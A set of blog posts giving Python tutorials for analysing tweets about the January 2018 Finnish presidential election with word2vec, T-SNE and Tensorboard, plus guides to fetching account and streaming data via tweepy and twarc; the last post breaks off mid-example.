NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely:

“Word2vec takes as its input a large corpus of text and produces a vector space, typically of several hundred dimensions, with each unique word in the corpus being assigned a corresponding vector in the space. Word vectors are positioned in the vector space such that words that share common contexts in the corpus are located in close proximity to one another in the space.”

During the two weeks leading up to the  January 2018 Finnish presidential elections, I performed an analysis of user interactions and behavior on Twitter, based on search terms relevant to that event. During the course of that analysis, I also dumped each Tweet’s raw text field to a text file, one item per line. I then wrote a small tool designed to preprocess the collected Tweets, feed that processed data into word2vec, and finally output some visualizations. Since word2vec creates multidimensional tensors, I’m using T-SNE for dimensionality reduction (the resulting visualizations are in two dimensions, compared to the 200 dimensions of the original data.)

The rest of this blog post will be devoted to listing and explaining the code used to perform these tasks. I’ll present the code as it appears in the tool. The code starts with a set of functions that perform processing and visualization tasks. The main routine at the end wraps everything up by calling each routine sequentially, passing artifacts from the previous step to the next one. As such, you can copy-paste each section of code into an editor, save the resulting file, and the tool should run (assuming you’ve pip installed all dependencies.) Note that I’m using two spaces per indent purely to allow the code to format neatly in this blog. Let’s start, as always, with importing dependencies. Off the top of my head, you’ll probably want to install tensorflow, gensim, six, numpy, matplotlib, and sklearn (although I think some of these install as part of tensorflow’s installation).

# -*- coding: utf-8 -*-
from tensorflow.contrib.tensorboard.plugins import projector
from sklearn.manifold import TSNE
from collections import Counter
from six.moves import cPickle
import gensim.models.word2vec as w2v
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import multiprocessing
import os
import sys
import io
import re
import json

The next listing contains a few helper functions. In each processing step, I like to save the output. I do this for two reasons. Firstly, depending on the size of your raw data, each step can take some time. Hence, if you’ve performed the step once, and saved the output, it can be loaded from disk to save time on subsequent passes. The second reason for saving each step is so that you can examine the output to check that it looks like what you want. The try_load_or_process() function attempts to load the previously saved output from a function. If it doesn’t exist, it runs the function and then saves the output. Note also the rather odd looking implementation in save_json(). This is a workaround for the fact that json.dump() errors out on certain non-ascii characters when paired with io.open().

def try_load_or_process(filename, processor_fn, function_arg):
  load_fn = None
  save_fn = None
  if filename.endswith("json"):
    load_fn = load_json
    save_fn = save_json
  else:
    load_fn = load_bin
    save_fn = save_bin
  if os.path.exists(filename):
    return load_fn(filename)
  else:
    ret = processor_fn(function_arg)
    save_fn(ret, filename)
    return ret

def print_progress(current, maximum):
  sys.stdout.write("\r")
  sys.stdout.flush()
  sys.stdout.write(str(current) + "/" + str(maximum))
  sys.stdout.flush()

def save_bin(item, filename):
  with open(filename, "wb") as f:
    cPickle.dump(item, f)

def load_bin(filename):
  if os.path.exists(filename):
    with open(filename, "rb") as f:
      return cPickle.load(f)

def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
  ret = None
  if os.path.exists(filename):
    try:
      with io.open(filename, "r", encoding="utf-8") as f:
        ret = json.load(f)
    except:
      pass
  return ret

Moving on, let’s look at the first preprocessing step. This function takes the raw text strings dumped from Tweets, removes unwanted characters and features (such as user names and URLs), removes duplicates, and returns a list of sanitized strings. Here, I’m not using string.printable for a list of characters to keep, since Finnish includes additional letters that aren’t part of the english alphabet (äöåÄÖÅ). The regular expressions used in this step have been somewhat tailored for the raw input data. Hence, you may need to tweak them for your own input corpus.

def process_raw_data(input_file):
  valid = u"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ#@.:/ äöåÄÖÅ"
  url_match = "(https?:\/\/[0-9a-zA-Z\-\_]+\.[\-\_0-9a-zA-Z]+\.?[0-9a-zA-Z\-\_]*\/?.*)"
  name_match = "\@[\_0-9a-zA-Z]+\:?"
  lines = []
  print("Loading raw data from: " + input_file)
  if os.path.exists(input_file):
    with io.open(input_file, 'r', encoding="utf-8") as f:
      lines = f.readlines()
  num_lines = len(lines)
  ret = []
  for count, text in enumerate(lines):
    if count % 50 == 0:
      print_progress(count, num_lines)
    text = re.sub(url_match, u"", text)
    text = re.sub(name_match, u"", text)
    text = re.sub("\&amp\;?", u"", text)
    text = re.sub("[\:\.]{1,}$", u"", text)
    text = re.sub("^RT\:?", u"", text)
    text = u''.join(x for x in text if x in valid)
    text = text.strip()
    if len(text.split()) > 5:
      if text not in ret:
        ret.append(text)
  return ret

The next step is to tokenize each sentence (or Tweet) into words.

def tokenize_sentences(sentences):
  ret = []
  max_s = len(sentences)
  print("Got " + str(max_s) + " sentences.")
  for count, s in enumerate(sentences):
    tokens = []
    words = re.split(r'(\s+)', s)
    if len(words) > 0:
      for w in words:
        if w is not None:
          w = w.strip()
          w = w.lower()
          if w.isspace() or w == "\n" or w == "\r":
            w = None
          if len(w) < 1:
            w = None
          if w is not None:
            tokens.append(w)
    if len(tokens) > 0:
      ret.append(tokens)
    if count % 50 == 0:
      print_progress(count, max_s)
  return ret

The final text preprocessing step removes unwanted tokens. This includes numeric data and stop words. Stop words are the most common words in a language. We omit them from processing in order to bring out the meaning of the text in our analysis. I downloaded a json dump of stop words for all languages from here, and placed it in the same directory as this script. If you plan on trying this code out yourself, you’ll need to perform the same steps. Note that I included extra stopwords of my own. After looking at the output of this step, I noticed that Twitter’s truncation of some tweets caused certain word fragments to occur frequently.

def clean_sentences(tokens):
  all_stopwords = load_json("stopwords-iso.json")
  extra_stopwords = ["ssä", "lle", "h.", "oo", "on", "muk", "kov", "km", "ia", "täm", "sy", "but", ":sta", "hi", "py", "xd", "rr", "x:", "smg", "kum", "uut", "kho", "k", "04n", "vtt", "htt", "väy", "kin", "#8", "van", "tii", "lt3", "g", "ko", "ett", "mys", "tnn", "hyv", "tm", "mit", "tss", "siit", "pit", "viel", "sit", "n", "saa", "tll", "eik", "nin", "nii", "t", "tmn", "lsn", "j", "miss", "pivn", "yhn", "mik", "tn", "tt", "sek", "lis", "mist", "tehd", "sai", "l", "thn", "mm", "k", "ku", "s", "hn", "nit", "s", "no", "m", "ky", "tst", "mut", "nm", "y", "lpi", "siin", "a", "in", "ehk", "h", "e", "piv", "oy", "p", "yh", "sill", "min", "o", "va", "el", "tyn", "na", "the", "tit", "to", "iti", "tehdn", "tlt", "ois", ":", "v", "?", "!", "&"]
  stopwords = None
  if all_stopwords is not None:
    stopwords = all_stopwords["fi"]
    stopwords += extra_stopwords
  ret = []
  max_s = len(tokens)
  for count, sentence in enumerate(tokens):
    if count % 50 == 0:
      print_progress(count, max_s)
    cleaned = []
    for token in sentence:
      if len(token) > 0:
        if stopwords is not None:
          for s in stopwords:
            if token == s:
              token = None
        if token is not None:
            if re.search("^[0-9\.\-\s\/]+$", token):
              token = None
        if token is not None:
            cleaned.append(token)
    if len(cleaned) > 0:
      ret.append(cleaned)
  return ret

The next function creates a vocabulary from the processed text. A vocabulary, in this context, is basically a list of all unique tokens in the data. This function creates a frequency distribution of all tokens (words) by counting the number of occurrences of each token. We will use this later to “trim” the vocabulary down to a manageable size.

def get_word_frequencies(corpus):
  frequencies = Counter()
  for sentence in corpus:
    for word in sentence:
      frequencies[word] += 1
  freq = frequencies.most_common()
  return freq

Now we’re done with all preprocessing steps, let’s get into the more interesting analysis functions. The following function accepts the tokenized and cleaned data generated from the steps above, and uses it to train a word2vec model. The num_features parameter sets the number of features each word is assigned (and hence the dimensionality of the resulting tensor.) It is recommended to set it between 100 and 1000. Naturally, larger values take more processing power and memory/disk space to handle. I found 200 to be enough, but I normally start with a value of 300 when looking at new datasets. The min_count variable passed to word2vec designates how to trim the vocabulary. For example, if min_count is set to 3, all words that appear in the data set less than 3 times will be discarded from the vocabulary used when training the word2vec model. In the dimensionality reduction step we perform later, large vocabulary sizes cause T-SNE iterations to take a long time. Hence, I tuned min_count to generate a vocabulary of around 10,000 words. Increasing the value of sample, will cause word2vec to randomly omit words with high frequency counts. I decided that I wanted to keep all of those words in my analysis, so it’s set to zero. Increasing epoch_count will cause word2vec to train for more iterations, which will, naturally take longer. Increase this if you have a fast machine or plenty of time on your hands 🙂

def get_word2vec(sentences):
  num_workers = multiprocessing.cpu_count()
  num_features = 200
  epoch_count = 10
  sentence_count = len(sentences)
  w2v_file = os.path.join(save_dir, "word_vectors.w2v")
  word2vec = None
  if os.path.exists(w2v_file):
    print("w2v model loaded from " + w2v_file)
    word2vec = w2v.Word2Vec.load(w2v_file)
  else:
    word2vec = w2v.Word2Vec(sg=1,
                            seed=1,
                            workers=num_workers,
                            size=num_features,
                            min_count=min_frequency_val,
                            window=5,
                            sample=0)

    print("Building vocab...")
    word2vec.build_vocab(sentences)
    print("Word2Vec vocabulary length:", len(word2vec.wv.vocab))
    print("Training...")
    word2vec.train(sentences, total_examples=sentence_count, epochs=epoch_count)
    print("Saving model...")
    word2vec.save(w2v_file)
  return word2vec

Tensorboard has some good tools to visualize word embeddings in the word2vec model we just created. These visualizations can be accessed using the “projector” tab in the interface. Here’s code to create tensorboard embeddings:

def create_embeddings(word2vec):
  all_word_vectors_matrix = word2vec.wv.syn0
  num_words = len(all_word_vectors_matrix)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim = word2vec.wv[vocab[0]].shape[0]
  embedding = np.empty((num_words, dim), dtype=np.float32)
  metadata = ""
  for i, word in enumerate(vocab):
    embedding[i] = word2vec.wv[word]
    metadata += word + "\n"
  metadata_file = os.path.join(save_dir, "metadata.tsv")
  with io.open(metadata_file, "w", encoding="utf-8") as f:
    f.write(metadata)

  tf.reset_default_graph()
  sess = tf.InteractiveSession()
  X = tf.Variable([0.0], name='embedding')
  place = tf.placeholder(tf.float32, shape=embedding.shape)
  set_x = tf.assign(X, place, validate_shape=False)
  sess.run(tf.global_variables_initializer())
  sess.run(set_x, feed_dict={place: embedding})

  summary_writer = tf.summary.FileWriter(save_dir, sess.graph)
  config = projector.ProjectorConfig()
  embedding_conf = config.embeddings.add()
  embedding_conf.tensor_name = 'embedding:0'
  embedding_conf.metadata_path = 'metadata.tsv'
  projector.visualize_embeddings(summary_writer, config)

  save_file = os.path.join(save_dir, "model.ckpt")
  print("Saving session...")
  saver = tf.train.Saver()
  saver.save(sess, save_file)

Once this code has been run, tensorflow log entries will be created in save_dir. To start a tensorboard session, run the following command from the same directory where this script was run from:

tensorboard –logdir=save_dir

You should see output like the following once you’ve run the above command:

TensorBoard 0.4.0rc3 at http://node.local:6006 (Press CTRL+C to quit)

Navigate your web browser to localhost:<port_number> to see the interface. From the “Inactive” pulldown menu, select “Projector”.

tensorboard projector menu item

The “projector” menu is often hiding under the “inactive” pulldown.

Once you’ve selected “projector”, you should see a view like this:

Tensorboard's projector view

Tensorboard’s projector view allows you to interact with word embeddings, search for words, and even run t-sne on the dataset.

There are a lot of things to play around with in this view. You can search for words, fly around the embeddings, and even run t-sne (on the bottom left) on the dataset. If you get to this step, have fun playing with the interface!

And now, back to the code. One of word2vec’s most interesting functions is to find similarities between words. This is done via the word2vec.wv.most_similar() call. The following function calls word2vec.wv.most_similar() for a word and returns num-similar words. The returned value is a list containing the queried word, and a list of similar words. ( [queried_word, [similar_word1, similar_word2, …]] ).

def most_similar(input_word, num_similar):
  sim = word2vec.wv.most_similar(input_word, topn=num_similar)
  output = []
  found = []
  for item in sim:
    w, n = item
    found.append(w)
  output = [input_word, found]
  return output

The following function takes a list of words to be queried, passes them to the above function, saves the output, and also passes the queried words to t_sne_scatterplot(), which we’ll show later. It also writes a csv file – associations.csv – which can be imported into Gephi to generate graphing visualizations. You can see some Gephi-generated visualizations in the accompanying blog post.

I find that manually viewing the word2vec_test.json file generated by this function is a good way to read the list of similarities found for each word queried with wv.most_similar().

def test_word2vec(test_words):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  output = []
  associations = {}
  test_items = test_words
  for count, word in enumerate(test_items):
    if word in vocab:
      print("[" + str(count+1) + "] Testing: " + word)
      if word not in associations:
        associations[word] = []
      similar = most_similar(word, num_similar)
      t_sne_scatterplot(word)
      output.append(similar)
      for s in similar[1]:
        if s not in associations[word]:
          associations[word].append(s)
    else:
      print("Word " + word + " not in vocab")
  filename = os.path.join(save_dir, "word2vec_test.json")
  save_json(output, filename)
  filename = os.path.join(save_dir, "associations.json")
  save_json(associations, filename)
  filename = os.path.join(save_dir, "associations.csv")
  handle = io.open(filename, "w", encoding="utf-8")
  handle.write(u"Source,Target\n")
  for w, sim in associations.iteritems():
    for s in sim:
      handle.write(w + u"," + s + u"\n")
  return output

The next function implements standalone code for creating a scatterplot from the output of T-SNE on a set of data points obtained from a word2vec.wv.most_similar() query. The scatterplot is visualized with matplotlib. Unfortunately, my matplotlib skills leave a lot to be desired, and these graphs don’t look great. But they’re readable.

def t_sne_scatterplot(word):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim0 = word2vec.wv[vocab[0]].shape[0]
  arr = np.empty((0, dim0), dtype='f')
  w_labels = [word]
  nearby = word2vec.wv.similar_by_word(word, topn=num_similar)
  arr = np.append(arr, np.array([word2vec[word]]), axis=0)
  for n in nearby:
    w_vec = word2vec[n[0]]
    w_labels.append(n[0])
    arr = np.append(arr, np.array([w_vec]), axis=0)

  tsne = TSNE(n_components=2, random_state=1)
  np.set_printoptions(suppress=True)
  Y = tsne.fit_transform(arr)
  x_coords = Y[:, 0]
  y_coords = Y[:, 1]

  plt.rc("font", size=16)
  plt.figure(figsize=(16, 12), dpi=80)
  plt.scatter(x_coords[0], y_coords[0], s=800, marker="o", color="blue")
  plt.scatter(x_coords[1:], y_coords[1:], s=200, marker="o", color="red")

  for label, x, y in zip(w_labels, x_coords, y_coords):
    plt.annotate(label.upper(), xy=(x, y), xytext=(0, 0), textcoords='offset points')
  plt.xlim(x_coords.min()-50, x_coords.max()+50)
  plt.ylim(y_coords.min()-50, y_coords.max()+50)
  filename = os.path.join(plot_dir, word + "_tsne.png")
  plt.savefig(filename)
  plt.close()

In order to create a scatterplot of the entire vocabulary, we need to perform T-SNE over that whole dataset. This can be a rather time-consuming operation. The next function performs that operation, attempting to save and re-load intermediate steps (since some of them can take over 30 minutes to complete).

def calculate_t_sne():
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  arr = np.empty((0, dim0), dtype='f')
  labels = []
  vectors_file = os.path.join(save_dir, "vocab_vectors.npy")
  labels_file = os.path.join(save_dir, "labels.json")
  if os.path.exists(vectors_file) and os.path.exists(labels_file):
    print("Loading pre-saved vectors from disk")
    arr = load_bin(vectors_file)
    labels = load_json(labels_file)
  else:
    print("Creating an array of vectors for each word in the vocab")
    for count, word in enumerate(vocab):
      if count % 50 == 0:
        print_progress(count, vocab_len)
      w_vec = word2vec[word]
      labels.append(word)
      arr = np.append(arr, np.array([w_vec]), axis=0)
    save_bin(arr, vectors_file)
    save_json(labels, labels_file)

  x_coords = None
  y_coords = None
  x_c_filename = os.path.join(save_dir, "x_coords.npy")
  y_c_filename = os.path.join(save_dir, "y_coords.npy")
  if os.path.exists(x_c_filename) and os.path.exists(y_c_filename):
    print("Reading pre-calculated coords from disk")
    x_coords = load_bin(x_c_filename)
    y_coords = load_bin(y_c_filename)
  else:
    print("Computing T-SNE for array of length: " + str(len(arr)))
    tsne = TSNE(n_components=2, random_state=1, verbose=1)
    np.set_printoptions(suppress=True)
    Y = tsne.fit_transform(arr)
    x_coords = Y[:, 0]
    y_coords = Y[:, 1]
    print("Saving coords.")
    save_bin(x_coords, x_c_filename)
    save_bin(y_coords, y_c_filename)
 return x_coords, y_coords, labels, arr

The next function takes the data calculated in the above step, and data obtained from test_word2vec(), and plots the results from each word queried on the scatterplot of the entire vocabulary. These plots are useful for visualizing which words are closer to others, and where clusters commonly pop up. This is the last function before we get onto the main routine.

def show_cluster_locations(results, labels, x_coords, y_coords):
  for item in results:
    name = item[0]
    print("Plotting graph for " + name)
    similar = item[1]
    in_set_x = []
    in_set_y = []
    out_set_x = []
    out_set_y = []
    name_x = 0
    name_y = 0
    for count, word in enumerate(labels):
      xc = x_coords[count]
      yc = y_coords[count]
      if word == name:
        name_x = xc
        name_y = yc
      elif word in similar:
        in_set_x.append(xc)
        in_set_y.append(yc)
      else:
        out_set_x.append(xc)
        out_set_y.append(yc)
    plt.figure(figsize=(16, 12), dpi=80)
    plt.scatter(name_x, name_y, s=400, marker="o", c="blue")
    plt.scatter(in_set_x, in_set_y, s=80, marker="o", c="red")
    plt.scatter(out_set_x, out_set_y, s=8, marker=".", c="black")
    filename = os.path.join(big_plot_dir, name + "_tsne.png")
    plt.savefig(filename)
    plt.close()

Now let’s write our main routine, which will call all the above functions, process our collected Twitter data, and generate visualizations. The first few lines take care of our three preprocessing steps, and generation of a frequency distribution / vocabulary. The script expects the raw Twitter data to reside in a relative path (data/tweets.txt). Change those variables as needed. Also, all output is saved to a subdirectory in the relative path (analysis/). Again, tailor this to your needs.

if __name__ == '__main__':
  input_dir = "data"
  save_dir = "analysis"
  if not os.path.exists(save_dir):
    os.makedirs(save_dir)

  print("Preprocessing raw data")
  raw_input_file = os.path.join(input_dir, "tweets.txt")
  filename = os.path.join(save_dir, "data.json")
  processed = try_load_or_process(filename, process_raw_data, raw_input_file)
  print("Unique sentences: " + str(len(processed)))

  print("Tokenizing sentences")
  filename = os.path.join(save_dir, "tokens.json")
  tokens = try_load_or_process(filename, tokenize_sentences, processed)

  print("Cleaning tokens")
  filename = os.path.join(save_dir, "cleaned.json")
  cleaned = try_load_or_process(filename, clean_sentences, tokens)

  print("Getting word frequencies")
  filename = os.path.join(save_dir, "frequencies.json")
  frequencies = try_load_or_process(filename, get_word_frequencies, cleaned)
  vocab_size = len(frequencies)
  print("Unique words: " + str(vocab_size))

Next, I trim the vocabulary, and save the resulting list of words. This allows me to look over the trimmed list and ensure that the words I’m interested in survived the trimming operation. Due to the nature of the Finnish language, (and Twitter), the vocabulary of our “cleaned” set, prior to trimming, was over 100,000 unique words. After trimming it ended up at around 11,000 words.

  trimmed_vocab = []
  min_frequency_val = 6
  for item in frequencies:
    if item[1] >= min_frequency_val:
      trimmed_vocab.append(item[0])
  trimmed_vocab_size = len(trimmed_vocab)
  print("Trimmed vocab length: " + str(trimmed_vocab_size))
  filename = os.path.join(save_dir, "trimmed_vocab.json")
  save_json(trimmed_vocab, filename)

The next few lines do all the compute-intensive work. We’ll create a word2vec model with the cleaned token set, create tensorboard embeddings (for the visualizations mentioned above), and calculate T-SNE. Yes, this part can take a while to run, so go put the kettle on.

  print
  print("Instantiating word2vec model")
  word2vec = get_word2vec(cleaned)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  print("word2vec vocab contains " + str(vocab_len) + " items.")
  dim0 = word2vec.wv[vocab[0]].shape[0]
  print("word2vec items have " + str(dim0) + " features.")

  print("Creating tensorboard embeddings")
  create_embeddings(word2vec)

  print("Calculating T-SNE for word2vec model")
  x_coords, y_coords, labels, arr = calculate_t_sne()

Finally, we’ll take the top 50 most frequent words from our frequency distrubution, query them for 40 most similar words, and plot both labelled graphs of each set, and a “big plot” of that set on the entire vocabulary.

  plot_dir = os.path.join(save_dir, "plots")
  if not os.path.exists(plot_dir):
    os.makedirs(plot_dir)

  num_similar = 40
  test_words = []
  for item in frequencies[:50]:
    test_words.append(item[0])
  results = test_word2vec(test_words)

  big_plot_dir = os.path.join(save_dir, "big_plots")
  if not os.path.exists(big_plot_dir):
    os.makedirs(big_plot_dir)
  show_cluster_locations(results, labels, x_coords, y_coords)

And that’s it! Rather a lot of code, but it does quite a few useful tasks. If you’re interested in seeing the visualizations I created using this tool against the Tweets collected from the January 2018 Finnish presidential elections, check out this blog post.



NLP Analysis And Visualizations Of #presidentinvaalit2018

During the lead-up to the January 2018 Finnish presidential elections, I collected a dataset consisting of raw Tweets gathered from search words related to the election. I then performed a series of natural language processing experiments on this raw data. The methodology, including all the code used, can be found in an accompanying blog post. This article details the results of my experiments, and shows some of the visualizations generated.

I pre-processed the raw dataset, used it to train a word2vec model, and then used that model to perform analyses using word2vec.wv.most_similar(), T-SNE, and Tensorboard.

My first experiment involved creating scatterplots of words found to be similar to frequently encountered tokens within the Twitter data. I looked at the 50 most frequent tokens encountered in this way, and used T-SNE to reduce the dimensionality of the set of vectors generated in each case. Results were plotted using matplotlib. Here are a few examples of the output generated.

T-SNE scatterplot of the 40 most similar words to #laura2018

T-SNE scatterplot of the 40 most similar words to #laura2018

Here you can see that word2vec easily identified other hashtags related to the #laura2018 campaign, including #suomitakaisin, #suomitakas, #siksilaura and #siksips. Laura Huhtasaari was candidate number 5 on the voting slip, and that was also identified, along with other hashtags associated with her name.

T-SNE scatterplot of the 40 most similar words to #turpo

T-SNE scatterplot of the 40 most similar words to #turpo

Here’s an analysis of the hashtag #turpo (short for turvallisuuspolitiikka – National Security). Here you can see that word2vec identified many references to NATO (one issue that was touched upon during election campaigning), jäsenyys (membership), #ulpo – ulkopolitiikka (Foreign Policy), and references to regions and countries (venäjä – Russia, ruotsi – Sweden, itämeri – Baltic).

T-SNE scatterplot of the 40 most similar words to venäjä

T-SNE scatterplot of the 40 most similar words to venäjä

On a similar note, here’s a scatterplot of words similar to venäjä (Russia). As expected, word2vec identified NATO in close relationship. Names of countries are expected to register as similar in word2vec, and we see Ruotsi (Sweden), Ukraine, USA, Turkki (Turkey), Syria, Kiina (China). Word2vec also finds the word Putin to be similar, and interestingly, Neuvostoliito (USSR) was mentioned in the Twitter data.

T-SNE scatterplot of the 40 most similar words to presidentti

T-SNE scatterplot of the 40 most similar words to presidentti

Above is a scatterplot based on the word “presidentti” (president). Note how word2vec identified Halonen, Urho, Kekkonen, Donald, and Trump.

Moving on, I took the names of the eight presidential candidates in Sunday’s election, and plotted them, along with the 40 most similar guesses from word2vec, on scatterplots of the entire vocabulary. Here are the results.

All candidates plotted against the full vocabulary. The blue dot is the target. Red dots are similar tokens.

All candidates plotted against the full vocabulary. The blue dot is the target. Red dots are similar tokens.

As you can see above, all of the candidates occupied separate spaces on the graph, and there was very little overlap amongst words similar to each candidate’s name.

I created word embeddings using Tensorflow, and opened the resulting log files in Tensorboard in order to produce some visualizations with that tool. Here are some of the outputs.

Tensorboard visualization of words related to #haavisto on a 2d representation of word embeddings, dimensionally reduced using T-SNE

Tensorboard visualization of words related to #haavisto2018 on a 2D representation of word embeddings, dimensionally reduced using T-SNE

The above shows word vectors in close proximity to #haavisto2018, based on the embeddings I created (from the word2vec model). Here you can find references to Tavastia, a club in Helsinki where Pekka Haavisto’s campaign hosted an event on 20th January 2018. Words clearly associated with this event include liput (tickets), ilta (evening), livenä (live), and biisejä (songs). The event was called “Siksipekka”. Here’s a view of that hashtag.

Again, we see similar words, including konsertti (concert). Another nearby word vector identified was #vihreät (the green party).

In my last experiment, I compiled lists of similar words for all of the top 50 most frequent words found in the Twitter data, and recorded associations between the lists generated. I imported this data into Gephi, and generated some graphs with it.

I got interested in Gephi after recently collaborating with Erin Gallagher (@3r1nG) to visualize the data I collected on some bots found to be following Finnish recommended Twitter accounts. I highly recommend that you check out some of her other blog posts, where you’ll see some amazing visualizations. Gephi is a powerful tool, but it takes quite some time to master. As you’ll see, my attempts at using it pale in comparison to what Erin can do.

A zoomed-out view of the mapping between the 40 most similar words to the 50 most frequent words in the Twitter data collected

A zoomed-out view of the mapping between the 40 most similar words to the 50 most frequent words in the Twitter data collected

The above is a graph of all the words found. Larger circles indicate that a word has more other words associated with it.

A zoomed-in view of some of the candidates

A zoomed-in view of some of the candidates

Here’s a zoom-in on some of the candidates. Note that I treated hashtags as unique words, which turned out to be useful for this analysis. For reference, here are a few translations: äänestää = vote, vaalit = elections, puhuu = to speak, presitenttiehdokas = presidential candidate.

Words related to foreign policy and national security

Words related to foreign policy and national security

Here is a zoomed-in view of the words associated with foreign policy and national security.

Words associated with Suomi (Finland)

Words associated with Suomi (Finland)

Finally, here are some words associated with #suomi (Finland). Note lots of references to nature (luonto), winter (talvi), and snow (lumi).

As you might have gathered, word2vec finds interesting and fairly accurate associations between words, even in messy data such as Tweets. I plan on delving further into this area in hopes of finding some techniques that might improve the Twitter research I’ve been doing. The dataset collected during the Finnish elections was fairly small (under 150,000 Tweets). Many of the other datasets I work with are orders of magnitude larger. Hence I’m particularly interested in figuring out if there’s a way to accurately cluster Twitter data using these techniques.

 



How To Get Tweets From A Twitter Account Using Python And Tweepy

In this blog post, I’ll explain how to obtain data from a specified Twitter account using tweepy and Python. Let’s jump straight into the code!

As usual, we’ll start off by importing dependencies. I’ll use the datetime and Counter modules later on to do some simple analysis tasks.

from tweepy import OAuthHandler
from tweepy import API
from tweepy import Cursor
from datetime import datetime, date, time, timedelta
from collections import Counter
import sys

The next bit creates a tweepy API object that we will use to query for data from Twitter. As usual, you’ll need to create a Twitter application in order to obtain the relevant authentication keys and fill in those empty strings. You can find a link to a guide about that in one of the previous articles in this series.

consumer_key=""
consumer_secret=""
access_token=""
access_token_secret=""

auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
auth_api = API(auth)

Names of accounts to be queried will be passed in as command-line arguments. I’m going to exit the script if no args are passed, since there would be no reason to continue.

account_list = []
if (len(sys.argv) > 1):
  account_list = sys.argv[1:]
else:
  print("Please provide a list of usernames at the command line.")
  sys.exit(0)

Next, let’s iterate through the account names passed and use tweepy’s API.get_user() to obtain a few details about the queried account.

if len(account_list) > 0:
  for target in account_list:
    print("Getting data for " + target)
    item = auth_api.get_user(target)
    print("name: " + item.name)
    print("screen_name: " + item.screen_name)
    print("description: " + item.description)
    print("statuses_count: " + str(item.statuses_count))
    print("friends_count: " + str(item.friends_count))
    print("followers_count: " + str(item.followers_count))

Twitter User Objects contain a created_at field that holds the creation date of the account. We can use this to calculate the age of the account, and since we also know how many Tweets that account has published (statuses_count), we can calculate the average Tweets per day rate of that account. Tweepy provides time-related values as datetime objects which are easy to calculate things like time deltas with.

    tweets = item.statuses_count
    account_created_date = item.created_at
    delta = datetime.utcnow() - account_created_date
    account_age_days = delta.days
    print("Account age (in days): " + str(account_age_days))
    if account_age_days > 0:
      print("Average tweets per day: " + "%.2f"%(float(tweets)/float(account_age_days)))

Next, let’s iterate through the user’s Tweets using tweepy’s API.user_timeline(). Tweepy’s Cursor allows us to stream data from the query without having to manually query for more data in batches. The Twitter API will return around 3200 Tweets using this method (which can take a while). To make things quicker, and show another example of datetime usage we’re going to break out of the loop once we hit Tweets that are more than 30 days old. While looping, we’ll collect lists of all hashtags and mentions seen in Tweets.

    hashtags = []
    mentions = []
    tweet_count = 0
    end_date = datetime.utcnow() - timedelta(days=30)
    for status in Cursor(auth_api.user_timeline, id=target).items():
      tweet_count += 1
      if hasattr(status, "entities"):
        entities = status.entities
        if "hashtags" in entities:
          for ent in entities["hashtags"]:
            if ent is not None:
              if "text" in ent:
                hashtag = ent["text"]
                if hashtag is not None:
                  hashtags.append(hashtag)
        if "user_mentions" in entities:
          for ent in entities["user_mentions"]:
            if ent is not None:
              if "screen_name" in ent:
                name = ent["screen_name"]
                if name is not None:
                  mentions.append(name)
      if status.created_at < end_date:
        break

Finally, we’ll use Counter.most_common() to print out the ten most used hashtags and mentions.

    print
    print("Most mentioned Twitter users:")
    for item, count in Counter(mentions).most_common(10):
      print(item + "\t" + str(count))

    print
    print("Most used hashtags:")
    for item, count in Counter(hashtags).most_common(10):
      print(item + "\t" + str(count))

    print
    print "All done. Processed " + str(tweet_count) + " tweets."
    print

And that’s it. A simple tool. But effective. And, of course, you can extend this code in any direction you like.



How To Get Streaming Data From Twitter

I occasionally receive requests to share my Twitter analysis tools. After a few recent requests, it finally occurred to me that it would make sense to create a series of articles that describe how to use Python and the Twitter API to perform basic analytical tasks. Teach a man to fish, and all that.

In this blog post, I’ll describe how to obtain streaming data using Python and the Twitter API.

I’m using twarc instead of tweepy to gather data from Twitter streams. I recently switched to using twarc, because has a simpler interface than tweepy, and handles most network errors and Twitter errors automatically.

In this article, I’ll provide two examples. The first one covers the simplest way to get streaming data from Twitter. Let’s start by importing our dependencies.

from twarc import Twarc
import sys

Next, create a twarc session. For this, you’ll need to create a Twitter application in order to obtain the relevant authentication keys and fill in those empty strings. You can find many guides on the Internet for this. Here’s one.

if __name__ == '__main__':
  consumer_key=""
  consumer_secret=""
  access_token=""
  access_token_secret=""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

For the sake of brevity, let’s assume search terms will be passed as a list on the command-line. We’ll simply accept that list without checking it’s validity. Your own implementation should probably do more.

  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]

Finally, we’ll check if we have any search targets. If we do, we’ll create a search query. If not, we’ll attach to the sample stream.

  if len(target_list) > 0:
    query = ",".join(target_list)
    print "Search: " + query
    for tweet in twarc.filter(track = query):
      print_tweet(tweet)
  else:
    print "Getting 1% sample."
    for tweet in twarc.sample():
      print_tweet(tweet)

Here’s a function to print the “text” field of each tweet we receive from the stream.

def print_tweet(status):
  if "text" in status:
    print status["text"]

And that’s it. In just over 20 lines of code, you can attach to a Twitter stream, receive Tweets, and process (or in this case, print) them.

In my second example, incoming Tweet objects will be pushed onto a queue in the main thread, while a second processing thread will pull those objects off the queue and process them. The reason we would want to separate gathering and processing into separate threads is to prevent any blocking by the processing step. Although in this example, simply printing a Tweet’s text out is unlikely to block under normal circumstances, once your processing code becomes more complex, blocking is more likely to occur. By offloading processing to a separate thread, your script should be able to handle things such as heavy Tweet volume spikes, writing to disk, communicating over the network, using machine learning models, and working with large frequency distribution maps.

As before, we’ll start by importing dependencies. We’re including threading (for multithreading), Queue (to manage a queue), and time (for time.sleep).

from twarc import Twarc
import Queue
import threading
import sys
import time

The following two functions will run in our processing thread. One will process a Tweet object. In this case, we’ll do exactly the same as in our previous example, and simply print the Tweet’s text out.

# Processing thread
